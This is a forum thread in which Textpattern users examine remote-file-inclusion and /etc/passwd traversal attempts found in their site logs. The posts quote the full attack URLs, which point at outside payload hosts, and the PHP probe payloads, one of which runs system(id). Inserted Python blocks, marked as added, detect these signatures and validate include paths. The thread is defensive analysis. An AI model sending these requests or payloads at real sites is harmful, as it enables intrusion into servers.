
Textpattern CMS support forum


#1 2009-12-13 00:12:59

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,293

Spurious URLs in visitor logs (id1.txt)

Over the past few days I’ve had some odd entries in the TXP logs on one of my sites. They look to me like a series of exploits from various IPs targeting different programs to, I assume, inject the name of somebody or some URL into the HTML page code. It doesn’t look any more sinister than that and, as far as I can tell, TXP is immune. They all seem to try to load some code in a file based on some permutation of id1.txt.

I can’t see anything changed on my server and the MySQL database seems ok so I don’t think these attempts amount to anything, but in case it’s anything more ominous and I’ve just not looked hard enough, here are the results of my sleuthing. Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me. Thanks!

Attempt 1

URL in TXP log: http://site.com/?PHORUM[settings_dir]=http://phoviet.vn.net//backend/id1.txt???
OR http://site.com/section/article//flash/initialise.php?foing_root_path=http://bobbydonut.com/stephanie/id11.txt??

IP: 91.121.181.60 ns1.hardlogin.com OR 74.86.17.106

Contents of id1.txt / id11.txt:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Attempt 2

URL in TXP log: http://site.com/index.php?pag=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt??

IP: 69.16.250.4 noc88.noc88.com

Contents of id1.txt:

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Attempt 3

URL in TXP log: http://site.com/section/article//plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??

IP: 91.192.110.155 155-110.furanet.com OR 80.55.55.178 rd178.internetdsl.tpnet.pl

The contents of id1.txt return a 404, but it first does some URL rewriting to translate the address to: http://www.hyonsvc.co.kr//%E2%80%8Bbbs//%E2%80%8Bupload/%E2%80%8Bid1.%E2%80%8Btxt?%E2%80%8B?

Attempt 4

URL in TXP log: http:///?pag=http://basic-it.de/phpShop/soap/id.txt?

IP: 94.75.207.2

Contents of id.txt:

<?php
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "xucx<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "xucx was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Attempt 5 (classic /etc/passwd access attempt)

URL in TXP log: index.php?pag=../../../../../../../../../../../../../etc/passwd%00

IP: 69.162.109.186 illusion-hosting.net OR 216.22.48.76


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

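The requests quoted above share two shapes: a query parameter whose entire value is an absolute URL to a `.txt` file (remote file inclusion attempts against Phorum, BackUpWordPress and similar scripts), and a parameter stuffed with `../` segments ending in a percent-encoded NUL (the /etc/passwd read). The following is an added example, not code from the thread or from Textpattern, that runs those signatures over the logged URLs; the `SAMPLE_LOG` list is constructed from the URLs quoted in this post, with two benign requests added for contrast, and the function and variable names are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the request URLs quoted in this thread plus two benign
# requests for comparison. A real TXP visitor log would be read from the database.
SAMPLE_LOG = [
    "http://site.com/?PHORUM[settings_dir]=http://phoviet.vn.net//backend/id1.txt???",
    "http://site.com/section/article//flash/initialise.php?foing_root_path=http://bobbydonut.com/stephanie/id11.txt??",
    "http://site.com/index.php?pag=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt??",
    "http://site.com/section/article//plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??",
    "http:///?pag=http://basic-it.de/phpShop/soap/id.txt?",
    "http://site.com/index.php?pag=../../../../../../../../../../../../../etc/passwd%00",
    "http://site.com/articles/hello-world",                 # benign
    "http://site.com/search?q=http%20is%20not%20a%20url",  # benign: the word 'http' but no scheme
]

# A parameter whose whole value is an absolute URL is the remote-file-inclusion
# signature; the trailing '?' marks make anything the vulnerable script appends
# to the path land in the remote request's query string instead.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.[/\\]")


def classify_request(url):
    """Return (kind, parameter, detail) findings for one logged request URL."""
    findings = []
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value, so %00 is a real NUL here.
        if REMOTE_URL.match(value):
            findings.append(("remote_file_inclusion", name, urlsplit(value).hostname))
        if TRAVERSAL.search(value):
            findings.append(("path_traversal", name, value.replace("\x00", "\\x00")))
        if "\x00" in value:
            findings.append(("null_byte", name, "NUL terminator to cut off an appended suffix"))
    return findings


def scan_log(urls):
    """Return [(url, findings)] for every request that produced at least one finding."""
    flagged = []
    for url in urls:
        findings = classify_request(url)
        if findings:
            flagged.append((url, findings))
    return flagged


def payload_hosts(urls):
    """Sorted, de-duplicated hosts the site was asked to fetch code from (for blocking or reporting)."""
    hosts = set()
    for _, findings in scan_log(urls):
        for kind, _, detail in findings:
            if kind == "remote_file_inclusion" and detail:
                hosts.add(detail)
    return sorted(hosts)


if __name__ == "__main__":
    for url, findings in scan_log(SAMPLE_LOG):
        print(url)
        for kind, param, detail in findings:
            print(f"    {kind:22} param={param!r} {detail}")
    print("payload hosts:", ", ".join(payload_hosts(SAMPLE_LOG)))
```

The check is deliberately on the decoded parameter value rather than on substrings of the raw URL: "http" inside a search term is not a finding, while a value that *starts* with a scheme is, whichever parameter name the scanner happened to guess.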

#2 2009-12-13 00:36:34

MattD
Plugin Author
From: Monterey, California
Registered: 2008-03-21
Posts: 1,254

Re: Spurious URLs in visitor logs (id1.txt)

I see stuff like this pretty regularly.


My Plugins

Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker


#3 2009-12-13 00:44:34

Gocom
Developer Emeritus
From: Helsinki, Finland
Registered: 2006-07-14
Posts: 4,533

Re: Spurious URLs in visitor logs (id1.txt)

Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me.

Nothing related to TXP. Just random script kids that are nothing to worry about.

  1. The first one is for old Phorum. The URL itself says what it relies on and tries to do: a global is set by the URL, the server includes the settings file and the page dies. TXP doesn’t register variables from URLs (unless a plugin or the server is set to do so).
  2. The URL’s acronym answers it: the sad and famous BackUpWordPress.

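The mechanism described in the post above is a request-controlled variable being used directly as an include path. As an added illustration (not Phorum's, BackUpWordPress's or Textpattern's code, and written in Python rather than PHP), the following shows the three checks such a path needs before anything is loaded from it: no NUL bytes, no URL scheme, and no resolving outside the intended directory. The base directory `/var/www/app/settings` is a hypothetical value, and the function names are my own.

```python
import os
from urllib.parse import unquote, urlsplit


class UnsafeIncludePath(ValueError):
    """Raised when a request-supplied include path fails validation."""


def resolve_include(base_dir, requested):
    """Map a request-supplied relative path onto a file under base_dir, or refuse.

    The three checks are the ones the scripts probed in this thread lacked:
    NUL bytes (which truncate a C string after an appended suffix), URL schemes
    (which turn a local include into a remote fetch) and '..' escapes.
    """
    value = unquote(requested)  # the web server hands the script the decoded form
    if "\x00" in value:
        raise UnsafeIncludePath("NUL byte in path")
    if urlsplit(value).scheme:
        raise UnsafeIncludePath("remote URL is not a local path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    # realpath collapses every '..' and symlink, so containment is decided on the
    # final target rather than on the text of the request.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeIncludePath("path escapes %s" % base)
    return candidate


def check(base_dir, requested):
    """Convenience wrapper returning 'ok:<resolved path>' or 'rejected:<reason>'."""
    try:
        return "ok:" + resolve_include(base_dir, requested)
    except UnsafeIncludePath as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    base = "/var/www/app/settings"  # hypothetical settings directory
    for requested in [
        "default/settings.php",
        "http://phoviet.vn.net//backend/id1.txt???",
        "../../../../../../../../../../../../../etc/passwd%00",
        "../../etc/passwd",
        "/etc/passwd",
    ]:
        print(f"{requested!r:60} -> {check(base, requested)}")
```

Note that `os.path.join` discards the base when the second argument is absolute, which is why the containment test runs on the joined, resolved result and not on whether the request "looks relative".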

#4 2009-12-13 08:07:25

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,032

Re: Spurious URLs in visitor logs (id1.txt)

I am getting it from http://www.zywesrebro.pl/fotki/fx29id1.txt
through

http://www.mysite.tld//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?

and

http://skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?

content:

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.


#5 2009-12-13 09:35:13

the_ghost
Plugin Author
From: Minsk, The Republic of Belarus
Registered: 2007-07-26
Posts: 907

Re: Spurious URLs in visitor logs (id1.txt)

Maybe by some pattern your site was recognised as using Phorum scripts and got into a hackers’ database as potentially buggy :) Nothing to worry about, I think.


Providing help in hacking ATM! Come to courses and don’t forget to bring us a notebook and a hammer! What for a notebook? What kind of hacker are you without a notebook?

